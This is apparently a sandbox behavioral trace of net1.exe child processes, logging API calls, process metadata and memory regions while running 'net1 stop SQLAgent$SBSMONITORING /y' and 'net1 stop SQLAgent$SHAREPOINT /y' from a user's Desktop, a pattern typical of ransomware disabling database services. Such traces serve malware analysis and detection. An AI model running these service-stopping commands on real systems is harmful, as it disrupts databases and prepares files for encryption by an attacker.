GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f890, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0111.578] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0111.578] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fae8 | out: Buffer=0x14fae8*=0x2a4d60) returned 0x0 [0111.578] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fae8 | out: Buffer=0x14fae8*=0x2ac130) returned 0x0 [0111.578] _fileno (_File=0x7fefdba2a80) returned 0 [0111.578] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0111.578] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0111.579] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0111.579] _wcsicmp (_String1="config", _String2="stop") returned -16 [0111.579] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0111.579] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0111.579] _wcsicmp (_String1="file", _String2="stop") returned -13 [0111.579] _wcsicmp (_String1="files", _String2="stop") returned -13 [0111.579] _wcsicmp (_String1="group", _String2="stop") returned -12 [0111.579] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0111.579] _wcsicmp (_String1="help", _String2="stop") returned -11 [0111.579] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0111.579] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0111.579] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0111.579] _wcsicmp (_String1="session", _String2="stop") returned -15 [0111.579] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0111.579] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0111.579] _wcsicmp (_String1="share", _String2="stop") returned -12 [0111.579] _wcsicmp (_String1="start", _String2="stop") returned -14 [0111.579] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0111.579] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0111.579] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0111.579] _wcsicmp (_String1="accounts", _String2="SQLAgent$SBSMONITORING") returned -18 [0111.579] _wcsicmp (_String1="computer", _String2="SQLAgent$SBSMONITORING") returned -16 [0111.579] _wcsicmp (_String1="config", _String2="SQLAgent$SBSMONITORING") returned -16 [0111.580] _wcsicmp (_String1="continue", _String2="SQLAgent$SBSMONITORING") returned -16 [0111.580] _wcsicmp (_String1="cont", _String2="SQLAgent$SBSMONITORING") returned -16 [0111.580] _wcsicmp (_String1="file", _String2="SQLAgent$SBSMONITORING") returned -13 [0111.580] _wcsicmp (_String1="files", _String2="SQLAgent$SBSMONITORING") returned -13 [0111.580] _wcsicmp (_String1="group", _String2="SQLAgent$SBSMONITORING") returned -12 [0111.580] _wcsicmp (_String1="groups", _String2="SQLAgent$SBSMONITORING") returned -12 [0111.580] _wcsicmp (_String1="help", _String2="SQLAgent$SBSMONITORING") returned -11 [0111.580] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SBSMONITORING") returned -11 [0111.580] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SBSMONITORING") returned -7 [0111.580] _wcsicmp (_String1="pause", _String2="SQLAgent$SBSMONITORING") returned -3 [0111.580] _wcsicmp (_String1="session", _String2="SQLAgent$SBSMONITORING") returned -12 [0111.580] _wcsicmp (_String1="sessions", _String2="SQLAgent$SBSMONITORING") returned -12 [0111.580] _wcsicmp (_String1="sess", _String2="SQLAgent$SBSMONITORING") returned -12 [0111.580] _wcsicmp (_String1="share", _String2="SQLAgent$SBSMONITORING") returned -9 [0111.580] _wcsicmp (_String1="start", _String2="SQLAgent$SBSMONITORING") returned 3 [0111.580] _wcsicmp (_String1="stats", _String2="SQLAgent$SBSMONITORING") returned 3 [0111.580] _wcsicmp (_String1="statistics", _String2="SQLAgent$SBSMONITORING") returned 3 [0111.580] _wcsicmp (_String1="stop", _String2="SQLAgent$SBSMONITORING") returned 3 [0111.580] _wcsicmp (_String1="time", _String2="SQLAgent$SBSMONITORING") returned 1 [0111.580] _wcsicmp (_String1="user", _String2="SQLAgent$SBSMONITORING") returned 2 [0111.580] _wcsicmp (_String1="users", _String2="SQLAgent$SBSMONITORING") returned 2 [0111.580] _wcsicmp (_String1="msg", _String2="SQLAgent$SBSMONITORING") returned -6 [0111.580] _wcsicmp (_String1="messenger", _String2="SQLAgent$SBSMONITORING") returned -6 [0111.580] _wcsicmp (_String1="receiver", _String2="SQLAgent$SBSMONITORING") returned -1 [0111.580] _wcsicmp (_String1="rcv", _String2="SQLAgent$SBSMONITORING") returned -1 [0111.580] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SBSMONITORING") returned -5 [0111.580] _wcsicmp (_String1="redirector", _String2="SQLAgent$SBSMONITORING") returned -1 [0111.580] _wcsicmp (_String1="redir", _String2="SQLAgent$SBSMONITORING") returned -1 [0111.580] _wcsicmp (_String1="rdr", _String2="SQLAgent$SBSMONITORING") returned -1 [0111.580] _wcsicmp (_String1="workstation", _String2="SQLAgent$SBSMONITORING") returned 4 [0111.581] _wcsicmp (_String1="work", _String2="SQLAgent$SBSMONITORING") returned 4 [0111.581] _wcsicmp (_String1="wksta", _String2="SQLAgent$SBSMONITORING") returned 4 [0111.581] _wcsicmp (_String1="prdr", _String2="SQLAgent$SBSMONITORING") returned -3 [0111.581] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SBSMONITORING") returned -15 [0111.581] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SBSMONITORING") returned -7 [0111.581] _wcsicmp (_String1="server", _String2="SQLAgent$SBSMONITORING") returned -12 [0111.581] _wcsicmp (_String1="svr", _String2="SQLAgent$SBSMONITORING") returned 5 [0111.581] _wcsicmp (_String1="srv", _String2="SQLAgent$SBSMONITORING") returned 1 [0111.581] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SBSMONITORING") returned -7 [0111.581] _wcsicmp (_String1="alerter", _String2="SQLAgent$SBSMONITORING") returned -18 [0111.581] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SBSMONITORING") returned -5 [0111.581] _wcsupr (in: _String="SQLAgent$SBSMONITORING" | out: _String="SQLAGENT$SBSMONITORING") returned="SQLAGENT$SBSMONITORING" [0111.581] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ace40 [0111.585] GetServiceKeyNameW (in: hSCManager=0x2ace40, lpDisplayName="SQLAGENT$SBSMONITORING", lpServiceName=0xff725750, lpcchBuffer=0x14fa08 | out: lpServiceName="", lpcchBuffer=0x14fa08) returned 0 [0111.586] _wcsicmp (_String1="msg", _String2="SQLAGENT$SBSMONITORING") returned -6 [0111.586] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SBSMONITORING") returned -6 [0111.586] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SBSMONITORING") returned -1 [0111.586] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SBSMONITORING") returned -1 [0111.586] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SBSMONITORING") returned -1 [0111.586] _wcsicmp (_String1="redir", _String2="SQLAGENT$SBSMONITORING") returned -1 [0111.587] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SBSMONITORING") returned -1 [0111.587] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SBSMONITORING") returned 4 [0111.587] _wcsicmp (_String1="work", _String2="SQLAGENT$SBSMONITORING") returned 4 [0111.587] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SBSMONITORING") returned 4 [0111.587] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SBSMONITORING") returned -3 [0111.587] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SBSMONITORING") returned -15 [0111.587] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SBSMONITORING") returned -7 [0111.587] _wcsicmp (_String1="server", _String2="SQLAGENT$SBSMONITORING") returned -12 [0111.587] _wcsicmp (_String1="svr", _String2="SQLAGENT$SBSMONITORING") returned 5 [0111.587] _wcsicmp (_String1="srv", _String2="SQLAGENT$SBSMONITORING") returned 1 [0111.587] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SBSMONITORING") returned -7 [0111.587] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SBSMONITORING") returned -18 [0111.587] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SBSMONITORING") returned -5 [0111.587] NetServiceControl (in: servername=0x0, service="SQLAGENT$SBSMONITORING", opcode=0x0, arg=0x0, bufptr=0x14fa10 | out: bufptr=0x14fa10) returned 0x889 [0111.588] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0111.588] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0111.589] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0111.591] GetFileType (hFile=0xb) returned 0x2 [0111.591] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0111.591] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x14f8d0*=0x1e) returned 1 [0111.591] GetFileType (hFile=0xb) returned 0x2 [0111.592] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0111.592] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x14f8d0*=0x2) returned 1 [0111.592] _ultow (in: _Dest=0x889, _Radix=1374528 | out: _Dest=0x889) returned="2185" [0111.592] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0111.592] GetFileType (hFile=0xb) returned 0x2 [0111.593] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0111.593] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x14f8d0*=0x34) returned 1 [0111.593] GetFileType (hFile=0xb) returned 0x2 [0111.593] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0111.594] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x14f8d0*=0x2) returned 1 [0111.594] NetApiBufferFree (Buffer=0x2a4d60) returned 0x0 [0111.594] NetApiBufferFree (Buffer=0x2ac130) returned 0x0 [0111.594] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SBSMONITORING /y" [0111.594] exit (_Code=2) Process: id = "282" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6b4af000" os_pid = "0x1138" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "275" os_parent_pid = "0x1158" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10271 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10272 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10273 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10274 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10275 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10276 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10277 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10278 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10279 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10280 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10281 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 10282 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10283 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 10284 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10285 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10309 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10310 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10311 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10312 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 10313 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10314 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10315 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10316 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10317 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10318 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10319 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10320 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10321 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10322 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10323 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10324 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10325 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10326 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10327 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10328 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10329 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10330 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10331 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10333 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 776 os_tid = 0x11c0 [0111.565] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fb10 | out: lpSystemTimeAsFileTime=0x16fb10*(dwLowDateTime=0xf7a5c9d0, dwHighDateTime=0x1d48689)) [0111.565] GetCurrentProcessId () returned 0x1138 [0111.565] GetCurrentThreadId () returned 0x11c0 [0111.565] GetTickCount () returned 0x25994 [0111.565] QueryPerformanceCounter (in: lpPerformanceCount=0x16fb18 | out: lpPerformanceCount=0x16fb18*=1815848300000) returned 1 [0111.567] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0111.567] __set_app_type (_Type=0x1) [0111.567] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0111.567] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0111.567] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.567] GetConsoleOutputCP () returned 0x1b5 [0111.595] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0111.595] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.597] sprintf_s (in: _DstBuf=0x16fab8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0111.597] setlocale (category=0, locale=".437") returned="English_United States.437" [0111.599] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.599] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.599] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SHAREPOINT /y" [0111.599] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f850, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0111.599] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0111.599] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16faa8 | out: Buffer=0x16faa8*=0x344d60) returned 0x0 [0111.599] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16faa8 | out: Buffer=0x16faa8*=0x34c130) returned 0x0 [0111.599] _fileno (_File=0x7fefdba2a80) returned 0 [0111.599] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0111.599] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0111.599] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0111.599] _wcsicmp (_String1="config", _String2="stop") returned -16 [0111.599] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0111.599] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0111.599] _wcsicmp (_String1="file", _String2="stop") returned -13 [0111.599] _wcsicmp (_String1="files", _String2="stop") returned -13 [0111.599] _wcsicmp (_String1="group", _String2="stop") returned -12 [0111.600] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0111.600] _wcsicmp (_String1="help", _String2="stop") returned -11 [0111.600] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0111.600] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0111.600] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0111.600] _wcsicmp (_String1="session", _String2="stop") returned -15 [0111.600] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0111.600] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0111.600] _wcsicmp (_String1="share", _String2="stop") returned -12 [0111.600] _wcsicmp (_String1="start", _String2="stop") returned -14 [0111.600] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0111.600] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0111.600] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0111.600] _wcsicmp (_String1="accounts", _String2="SQLAgent$SHAREPOINT") returned -18 [0111.600] _wcsicmp (_String1="computer", _String2="SQLAgent$SHAREPOINT") returned -16 [0111.600] _wcsicmp (_String1="config", _String2="SQLAgent$SHAREPOINT") returned -16 [0111.600] _wcsicmp (_String1="continue", _String2="SQLAgent$SHAREPOINT") returned -16 [0111.600] _wcsicmp (_String1="cont", _String2="SQLAgent$SHAREPOINT") returned -16 [0111.600] _wcsicmp (_String1="file", _String2="SQLAgent$SHAREPOINT") returned -13 [0111.600] _wcsicmp (_String1="files", _String2="SQLAgent$SHAREPOINT") returned -13 [0111.600] _wcsicmp (_String1="group", _String2="SQLAgent$SHAREPOINT") returned -12 [0111.600] _wcsicmp (_String1="groups", _String2="SQLAgent$SHAREPOINT") returned -12 [0111.600] _wcsicmp (_String1="help", _String2="SQLAgent$SHAREPOINT") returned -11 [0111.600] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SHAREPOINT") returned -11 [0111.600] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SHAREPOINT") returned -7 [0111.600] _wcsicmp (_String1="pause", _String2="SQLAgent$SHAREPOINT") returned -3 [0111.600] _wcsicmp (_String1="session", _String2="SQLAgent$SHAREPOINT") returned -12 [0111.600] _wcsicmp (_String1="sessions", _String2="SQLAgent$SHAREPOINT") returned -12 [0111.600] _wcsicmp (_String1="sess", _String2="SQLAgent$SHAREPOINT") returned -12 [0111.600] _wcsicmp (_String1="share", _String2="SQLAgent$SHAREPOINT") returned -9 [0111.600] _wcsicmp (_String1="start", _String2="SQLAgent$SHAREPOINT") returned 3 [0111.600] _wcsicmp (_String1="stats", _String2="SQLAgent$SHAREPOINT") returned 3 [0111.600] _wcsicmp (_String1="statistics", _String2="SQLAgent$SHAREPOINT") returned 3 [0111.601] _wcsicmp (_String1="stop", _String2="SQLAgent$SHAREPOINT") returned 3 [0111.601] _wcsicmp (_String1="time", _String2="SQLAgent$SHAREPOINT") returned 1 [0111.601] _wcsicmp (_String1="user", _String2="SQLAgent$SHAREPOINT") returned 2 [0111.601] _wcsicmp (_String1="users", _String2="SQLAgent$SHAREPOINT") returned 2 [0111.601] _wcsicmp (_String1="msg", _String2="SQLAgent$SHAREPOINT") returned -6 [0111.601] _wcsicmp (_String1="messenger", _String2="SQLAgent$SHAREPOINT") returned -6 [0111.601] _wcsicmp (_String1="receiver", _String2="SQLAgent$SHAREPOINT") returned -1 [0111.601] _wcsicmp (_String1="rcv", _String2="SQLAgent$SHAREPOINT") returned -1 [0111.601] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SHAREPOINT") returned -5 [0111.601] _wcsicmp (_String1="redirector", _String2="SQLAgent$SHAREPOINT") returned -1 [0111.601] _wcsicmp (_String1="redir", _String2="SQLAgent$SHAREPOINT") returned -1 [0111.601] _wcsicmp (_String1="rdr", _String2="SQLAgent$SHAREPOINT") returned -1 [0111.601] _wcsicmp (_String1="workstation", _String2="SQLAgent$SHAREPOINT") returned 4 [0111.601] _wcsicmp (_String1="work", _String2="SQLAgent$SHAREPOINT") returned 4 [0111.601] _wcsicmp (_String1="wksta", _String2="SQLAgent$SHAREPOINT") returned 4 [0111.601] _wcsicmp (_String1="prdr", _String2="SQLAgent$SHAREPOINT") returned -3 [0111.601] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SHAREPOINT") returned -15 [0111.601] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SHAREPOINT") returned -7 [0111.601] _wcsicmp (_String1="server", _String2="SQLAgent$SHAREPOINT") returned -12 [0111.601] _wcsicmp (_String1="svr", _String2="SQLAgent$SHAREPOINT") returned 5 [0111.601] _wcsicmp (_String1="srv", _String2="SQLAgent$SHAREPOINT") returned 1 [0111.601] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SHAREPOINT") returned -7 [0111.601] _wcsicmp (_String1="alerter", _String2="SQLAgent$SHAREPOINT") returned -18 [0111.601] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SHAREPOINT") returned -5 [0111.601] _wcsupr (in: _String="SQLAgent$SHAREPOINT" | out: _String="SQLAGENT$SHAREPOINT") returned="SQLAGENT$SHAREPOINT" [0111.602] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x34ce40 [0111.605] GetServiceKeyNameW (in: hSCManager=0x34ce40, lpDisplayName="SQLAGENT$SHAREPOINT", lpServiceName=0xff725750, lpcchBuffer=0x16f9c8 | out: lpServiceName="", lpcchBuffer=0x16f9c8) returned 0 [0111.607] _wcsicmp (_String1="msg", _String2="SQLAGENT$SHAREPOINT") returned -6 [0111.607] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SHAREPOINT") returned -6 [0111.607] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SHAREPOINT") returned -1 [0111.607] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SHAREPOINT") returned -1 [0111.607] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SHAREPOINT") returned -1 [0111.607] _wcsicmp (_String1="redir", _String2="SQLAGENT$SHAREPOINT") returned -1 [0111.607] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SHAREPOINT") returned -1 [0111.607] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SHAREPOINT") returned 4 [0111.607] _wcsicmp (_String1="work", _String2="SQLAGENT$SHAREPOINT") returned 4 [0111.607] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SHAREPOINT") returned 4 [0111.607] 